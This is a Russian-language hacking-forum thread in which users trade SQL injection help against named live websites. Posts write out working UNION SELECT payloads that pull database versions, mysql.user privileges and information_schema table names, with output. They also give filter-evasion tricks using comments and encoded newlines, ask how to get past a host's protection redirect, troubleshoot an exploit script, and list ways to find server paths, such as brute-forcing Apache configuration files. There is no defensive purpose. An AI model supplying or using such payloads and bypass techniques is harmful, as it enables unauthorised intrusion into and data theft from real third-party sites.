Как обойти зашиту от Spaceweb? У меня такой запрос: PHP: http://site.ru/news_view.php?id=-189'+union+select+1,2,3,4,5,6,7,file_priv,9+from+mysql.user+--+ Но после выполняется редирект на сайт Spaceweb, как обойти это?
Добрый день, я совсем новичок, и вот нашел парсером скуль и начал пробовать вот так: Code: http://prazdnik.com.ua/index.php?id=54&pid=3509+order+by+10/* http://prazdnik.com.ua/index.php?id=54&pid=3509+order+by+10 http://prazdnik.com.ua/index.php?id=54&pid=3509+order+by+10 http://prazdnik.com.ua/index.php?id=54&pid=-3509+order+by+10/* http://prazdnik.com.ua/index.php?id=54&pid=1+order+by+10 http://prazdnik.com.ua/index.php?id=54&pid=-1+order+by+10 http://prazdnik.com.ua/index.php?id=54&pid=1+union+select+1,2,3,4,5 и т.д. Но нужных ошибок я все равно не получил, кто может раскрутите, покажите и ткните что я неправильно сделал
to compod http://prazdnik.com.ua/index.php?id=54&pid=3509-9999.9+union+select+111111,version(),33333333,44444444,555555,6666666,7777777,8888888,9999999,10,11,12,13,14,15--+f Вывод в исходном коде на 399 строке либо в середине страницы 5.0.51a-24+lenny5-log
http://prazdnik.com.ua/index.php?id=54&pid=3509+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15-- Самые забавные первоапрельские розыгрыши 2013 на телефон 5.0.51a-24+lenny5-log
https://forum.antichat.ru/thread43966.html читай полностью. именно пункт "2.1.2 Определение выводимых столбцов"
http://www.cheaz-sms.ru/index.php?p=gallerypic&img_id=-10/*!union%23%0aselect+1,2,3,table_name,5,6,7,8,9*/from%23%0ainformation_schema.tables--+f&galid=1&area=1&ascdesc=desc Фильтруется точка,как нибудь обойти можно?
http://www.cheaz-sms.ru/index.php?p=gallerypic&img_id=-10 /*!union*//*!select*/ 1,2,3,(select table_name from `information_schema`.`tables` limit 1),5,6,7,8,9&galid=1&area=1&ascdesc=desc
Пытаюсь заюзать вот этот эксплоит _http://forum.antichat.ru/showpost.php?p=2748145&postcount=24 Но выдает ошибку syntax error, unexpected T_String in "путь до эксплоита" on line 169 Запускал так, забивал в командную строку "Путь до php.exe" "Путь до эксплоита" Прошу помощи..)!
Строка 169, более подробно Убери пробелы. Делаю ставку на то, что после исправления, будет ошибка указывающая на 191 строку =)
Говорю несколько способов. Смотря какая CMS, для каждой есть свои способы 1) В куку сессии подставить спец символ, например "^" 2) Юзать гугл с текстом site:факме.рф intext:error 3) Пытаться подставлять в параметры зависящие от пользователя, т.е. head, post, get etc. всякую лабуду, которая может неправильно обработаться скриптом. 4) Найти phpinfo файл 5) Х*ярить сканером на файлы до посинения с помощью того же ArxScanSite с целью поиска файла оставленного мастером с таким содержанием: getcwd() или $SERVER['DOCUMENT_ROOT'] - если php конечно.
Если нет вывода ошибок содержащих путь сайта, то следует использовать брутфорс конфигурационных файлов WEB-сервера скриптами типа Toolza и д.р. К примеру CentOS, Fedora (Redhat-системы) и сервер Apache /etc/httpd/conf/httpd.conf Там смотришь секции DocumentRoot, VirtualHost.
